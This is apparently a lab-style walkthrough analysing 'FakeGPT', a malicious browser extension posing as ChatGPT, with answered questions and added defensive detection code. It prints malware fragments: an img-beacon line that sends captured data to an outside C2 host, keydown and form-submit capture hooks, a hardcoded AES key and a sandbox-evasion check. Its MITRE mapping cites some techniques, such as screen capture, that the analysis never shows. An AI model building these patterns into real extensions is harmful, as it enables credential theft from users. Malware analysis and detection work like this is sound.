# FakeGPT — Malware Analysis Walkthrough

**Category:** Malware Analysis\
**Tactics:** Credential Access, Collection, Command and Control, Exfiltration\
**Tools Used:** JavaScript static analysis, browser extension inspection, ExtAnalysis, CyberChef

***

### 🧠 Scenario

Employees reported strange behavior after installing a browser extension named “ChatGPT.” Your task: reverse-engineer the extension to identify its malicious behavior and exfiltration techniques.

***

### 📂 Files in the Extension

* `manifest.json` – Extension metadata
* `app.js` – Handles data capture and exfiltration
* `loader.js` – Loads core logic, anti-analysis checks
* `core.js` – Shared logic
* `ui.html` – Display interface
* `sussy.gif` – Decoy media

***

### 🔍 Analysis and Q\&A

***

#### 🔹 Q1: **Which encoding method does the browser extension use to obscure target URLs?**

In `app.js`, string literals drawn only from the Base64 alphabet and ending in `==` padding are a strong indicator of **Base64** encoding. Decoding one of them reveals the target URL.

✅ **Answer:**

```
base64
```

***

#### 🔹 Q2: **Which website does the extension monitor for data theft?**

The decoded Base64 string shows:

```
https://www.facebook.com
```

✅ **Answer:**

```
www.facebook.com
```
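The `==` hint above can be turned into a repeatable first-pass check. The following is an added example, not code from the FakeGPT extension or from the original write-up: it scans a constructed stand-in for `app.js` (the sample source is built inline and is not the real file) for Base64-shaped string literals, decodes them, and reports which ones are URLs, which is how the monitored site in Q2 falls out of Q1.

```javascript
// Added example: hunt for Base64-looking string literals in extension source
// and decode them. Not code from the FakeGPT extension or the write-up.

// Constructed sample source standing in for app.js (not the real file).
const toB64 = (s) => Buffer.from(s, 'utf8').toString('base64');
const SAMPLE_APP_JS = `
const TARGET = "${toB64('https://www.facebook.com')}";
const C2_URL = atob("${toB64('https://c2.example.invalid/beacon.gif')}");
const GREETING = "Hello, world";
const SHORT = "AAAA";
`;

// Quoted literals made only of the Base64 alphabet, at least 16 characters,
// with optional '=' padding (the padding is what gave app.js away).
const LITERAL_RE = /["'`]([A-Za-z0-9+\/]{16,}={0,2})["'`]/g;
const PRINTABLE_RE = /^[\x20-\x7e]+$/;

function findEncodedStrings(source) {
  const hits = [];
  for (const match of source.matchAll(LITERAL_RE)) {
    const literal = match[1];
    if (literal.length % 4 !== 0) continue; // valid Base64 is 4-aligned
    const decoded = Buffer.from(literal, 'base64').toString('utf8');
    // Require a clean round-trip and printable output to cut false positives
    // (identifiers, hashes, random tokens that merely look like Base64).
    if (toB64(decoded) !== literal || !PRINTABLE_RE.test(decoded)) continue;
    hits.push({
      literal,
      decoded,
      padded: literal.endsWith('='),
      isUrl: /^https?:\/\//.test(decoded),
    });
  }
  return hits;
}

// Just the decoded URLs, i.e. the sites the extension is interested in.
function targetUrls(source) {
  return findEncodedStrings(source)
    .filter((h) => h.isUrl)
    .map((h) => h.decoded);
}

for (const h of findEncodedStrings(SAMPLE_APP_JS)) {
  console.log(`${h.literal} -> ${h.decoded}${h.isUrl ? '  [URL]' : ''}`);
}
```

Run it with Node against any extracted `.js` file by replacing `SAMPLE_APP_JS` with the file contents; the round-trip check keeps short identifiers and hashes from showing up as false positives.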

***

#### 🔹 Q3: **Which type of HTML element is used to send stolen data?**

From the `sendToServer` function:

```js
let img = document.createElement('img');
img.src = C2_URL + "?data=" + encryptedData; // assigning src fires the GET request
```

✅ **Answer:**

```
<img>
```

***

#### 🔹 Q4: **What is the first condition that triggers the extension to deactivate itself?**

`loader.js` first checks whether the browser reports no plugins at all, a common trait of headless or automated analysis environments, and deactivates the extension if so:

```js
if (navigator.plugins.length === 0)
```

✅ **Answer:**

```
navigator.plugins.length === 0
```

***

#### 🔹 Q5: **Which event does the extension capture to track form submissions?**

In `app.js`, credentials are intercepted on form submission:

```js
form.addEventListener("submit", ...)
```

✅ **Answer:**

```
submit
```

***

#### 🔹 Q6: **Which method is used to capture keystrokes?**

Also in `app.js`, keylogging is implemented via:

```js
document.addEventListener("keydown", ...)
```

✅ **Answer:**

```
keydown
```
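Q4, Q5 and Q6 together describe what an analyst wants from a dynamic-analysis environment: answer the headless-browser probe so the sample keeps running, and record which events it hooks. The following is an added example, not code from FakeGPT or the original write-up. It builds a `Proxy`-wrapped stand-in for `navigator` that logs every property the loader reads and returns browser-like values (all constructed), and wraps `EventTarget.prototype.addEventListener` so the `submit` and `keydown` subscriptions are recorded. The two small functions named `loaderWouldDeactivate` and `sampleRegistersHooks` are hypothetical stand-ins for the loader and app logic, since Node has no DOM.

```javascript
// Added example: instrumentation an analyst loads before the extension's
// scripts. Not code from FakeGPT or the write-up.

const accessLog = [];   // navigator properties the sample looked at
const listenerLog = []; // events the sample registered handlers for

// Browser-like answers to common anti-analysis probes (values constructed).
const fakeNavigator = new Proxy(
  {
    plugins: { length: 3 }, // defeats `navigator.plugins.length === 0`
    webdriver: false,       // some loaders also look for automation flags
    languages: ['en-US', 'en'],
    userAgent: 'Mozilla/5.0 (constructed user agent for analysis)',
  },
  {
    get(target, prop) {
      accessLog.push(String(prop));
      return target[prop];
    },
  },
);

// Wrap addEventListener so every subscription is recorded with its target.
function instrumentEventTarget(proto) {
  const original = proto.addEventListener;
  proto.addEventListener = function (type, listener, options) {
    listenerLog.push({ target: this.constructor.name, type });
    return original.call(this, type, listener, options);
  };
  return () => { proto.addEventListener = original; }; // restore function
}

// Hypothetical stand-in for the loader's first deactivation check (Q4).
function loaderWouldDeactivate(nav) {
  return nav.plugins.length === 0;
}

// Hypothetical stand-in for app.js registering its capture hooks (Q5, Q6).
function sampleRegistersHooks(form, doc) {
  form.addEventListener('submit', () => {});
  doc.addEventListener('keydown', () => {});
}

const SENSITIVE_EVENTS = ['submit', 'keydown', 'keypress', 'input'];

function runHarness() {
  accessLog.length = 0;
  listenerLog.length = 0;
  const restore = instrumentEventTarget(EventTarget.prototype);
  try {
    const deactivated = loaderWouldDeactivate(fakeNavigator);
    // Two plain EventTargets stand in for the login form and `document`.
    sampleRegistersHooks(new EventTarget(), new EventTarget());
    return {
      deactivated,
      probedProperties: [...accessLog],
      sensitiveEvents: listenerLog
        .map((l) => l.type)
        .filter((t) => SENSITIVE_EVENTS.includes(t)),
    };
  } finally {
    restore();
  }
}

console.log(JSON.stringify(runHarness(), null, 2));
```

In a real browser-based sandbox the same two hooks are installed from a content script or DevTools snippet that runs before the extension; the access log then shows which fingerprinting checks a loader performs before it decides to stay alive.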

***

#### 🔹 Q7: **What is the domain where exfiltrated data is sent?**

Exfiltration happens via the `<img>` beacon from Q3, whose request goes to a hardcoded domain:

✅ **Answer:**

```
Mo.Elshaheedy.com
```
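The `<img>` beacon in Q3 and the hardcoded domain in Q7 leave a characteristic trace in web proxy logs: a `GET` to a host nobody allowlisted, with a long Base64-shaped value in a query parameter. The following is an added example, not code from the write-up: a detector run over a few constructed log lines (the traffic is invented; only the exfil host name is taken from the walkthrough). The allowlist and the `data`/`d`/`q`/`payload` parameter names are this example's assumptions.

```javascript
// Added example: flag image-beacon style exfiltration in proxy logs.
// Log lines are constructed for this example; they are not real traffic.
const SAMPLE_LOG = [
  '2024-01-01T10:00:00Z GET https://www.facebook.com/login.php',
  '2024-01-01T10:00:01Z GET https://static.xx.fbcdn.net/rsrc.php/v3/logo.png',
  '2024-01-01T10:00:02Z GET https://Mo.Elshaheedy.com/?data=' + 'QUJD'.repeat(20) + '%3D%3D',
  '2024-01-01T10:00:03Z GET https://www.facebook.com/ajax/?data=12',
  '2024-01-01T10:00:04Z GET https://cdn.example.invalid/pixel.gif?id=42',
];

const ALLOWED_HOSTS = new Set(['www.facebook.com', 'static.xx.fbcdn.net']); // assumed allowlist
const SUSPECT_PARAMS = ['data', 'd', 'q', 'payload'];                        // assumed names
const B64_SHAPE = /^[A-Za-z0-9+\/]+={0,2}$/;
const MIN_PAYLOAD = 64; // shorter values are usually ordinary identifiers

function parseLine(line) {
  const [ts, method, url] = line.trim().split(/\s+/);
  return { ts, method, url };
}

// Returns a finding for one URL, or null when it looks benign.
function beaconVerdict(urlStr, allowed = ALLOWED_HOSTS) {
  let url;
  try { url = new URL(urlStr); } catch { return null; }
  if (allowed.has(url.hostname)) return null;
  for (const name of SUSPECT_PARAMS) {
    const value = url.searchParams.get(name); // percent-decoding happens here
    if (value && value.length >= MIN_PAYLOAD && B64_SHAPE.test(value)) {
      // A beacon fetched via img.src tends to have no real resource path, or
      // points at an image extension; recorded as context, not as a filter.
      const imageLike = url.pathname === '/' ||
        /\.(gif|png|jpe?g|webp)$/i.test(url.pathname);
      return { host: url.hostname, param: name, bytes: value.length, imageLike };
    }
  }
  return null;
}

function scanLog(lines, allowed = ALLOWED_HOSTS) {
  const alerts = [];
  for (const line of lines) {
    const { ts, method, url } = parseLine(line);
    if (method !== 'GET') continue; // img.src always produces a GET
    const verdict = beaconVerdict(url, allowed);
    if (verdict) alerts.push({ ts, ...verdict });
  }
  return alerts;
}

for (const a of scanLog(SAMPLE_LOG)) {
  console.log(`${a.ts} beacon to ${a.host} (${a.bytes} bytes in ?${a.param}, imageLike=${a.imageLike})`);
}
```

The size threshold and allowlist are the tuning knobs: real credential or keystroke payloads are far longer than tracking identifiers, so the false-positive rate stays low even without decoding the value.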

***

#### 🔹 Q8: **Which function exfiltrates credentials?**

Found in `app.js`:

```js
exfiltrateCredentials(username, password);
```

✅ **Answer:**

```
exfiltrateCredentials
```

***

#### 🔹 Q9: **Which encryption algorithm secures data before exfiltration?**

The `encryptPayload()` function uses:

* **Algorithm:** AES
* **Key:** `"SuperSecretKey123"`
* **IV:** Random, generated per message

✅ **Answer:**

```
AES
```

***

#### 🔹 Q10: **What browser API is used to manipulate cookies?**

`manifest.json` declares the permission that gives the extension access to the browser's cookie API:

✅ **Answer:**

```
cookies
```
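The manifest is also the cheapest place to stop an extension like this before it is installed. The following is an added example, not the real FakeGPT `manifest.json` and not code from the write-up: it triages a constructed manifest that resembles what a credential stealer posing as "ChatGPT" would request, scoring the `cookies` permission, broad host access, and the combination of a content script on a login site with cookie access. The risk weights and thresholds are this example's assumptions, to be tuned to local policy.

```javascript
// Added example: permission triage for a browser extension manifest.
// The manifest below is constructed; it is not the real FakeGPT manifest.
const SAMPLE_MANIFEST = {
  manifest_version: 3,
  name: 'ChatGPT',
  version: '1.0',
  permissions: ['cookies', 'storage', 'tabs', 'webRequest'],
  host_permissions: ['<all_urls>'],
  content_scripts: [{
    matches: ['https://www.facebook.com/*'],
    js: ['loader.js', 'app.js'],
    run_at: 'document_start',
  }],
};

// Assumed risk weights (tune to local policy).
const PERMISSION_RISK = {
  cookies: 3,            // read/write session cookies: session hijack material
  webRequest: 3,         // observe every request the browser makes
  webRequestBlocking: 3,
  tabs: 2,
  history: 2,
  clipboardRead: 2,
  storage: 0,
};
const BROAD_HOST_RISK = 3;

function triageManifest(manifest) {
  const findings = [];
  let score = 0;
  const permissions = manifest.permissions ?? [];

  for (const p of permissions) {
    const w = PERMISSION_RISK[p];
    if (w === undefined) {
      findings.push({ item: p, severity: 'unknown' }); // not in the table: review by hand
    } else if (w > 0) {
      findings.push({ item: p, severity: w >= 3 ? 'high' : 'medium' });
      score += w;
    }
  }

  // Host access comes from host_permissions and from content_scripts.matches.
  const hosts = [
    ...(manifest.host_permissions ?? []),
    ...(manifest.content_scripts ?? []).flatMap((cs) => cs.matches ?? []),
  ];
  for (const h of hosts) {
    if (h === '<all_urls>' || /^\*:\/\/\*\//.test(h)) {
      findings.push({ item: h, severity: 'high' });
      score += BROAD_HOST_RISK;
    }
  }

  // The combination seen in this sample: a script injected into a login page
  // plus the cookies permission can capture input and lift the session too.
  const touchesLogin = hosts.some((h) => /facebook\.com|login|accounts\./i.test(h));
  if (touchesLogin && permissions.includes('cookies')) {
    findings.push({ item: 'cookies + content script on login host', severity: 'high' });
    score += 2;
  }

  const verdict = score >= 6 ? 'block' : score >= 3 ? 'review' : 'allow';
  return { score, verdict, findings };
}

console.log(JSON.stringify(triageManifest(SAMPLE_MANIFEST), null, 2));
```

Extensions that only need `storage` and a single host pattern score zero and pass; anything asking for cookie access on a site where users log in is surfaced for review regardless of what the name or icon claims.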

***

### 🛡️ MITRE ATT\&CK Mapping

| Tactic            | Technique ID | Description                                        |
| ----------------- | ------------ | -------------------------------------------------- |
| Execution         | T1203        | Exploitation for Client Execution                  |
| Credential Access | T1056, T1555 | Input Capture, Credentials from Password Stores    |
| Collection        | T1113, T1056 | Screen Capture, Input Capture                      |
| Exfiltration      | T1041        | Exfiltration Over C2 Channel                       |
| Defense Evasion   | T1027        | Obfuscated Files or Information                    |

***

### ✅ Conclusion

The FakeGPT extension:

* Mimics ChatGPT to appear legitimate
* Steals credentials and keystrokes
* Encrypts data using AES
* Sends it to a hardcoded exfil domain
* Disables itself in sandbox environments

A clean example of real-world, browser-based credential theft with stealth features.

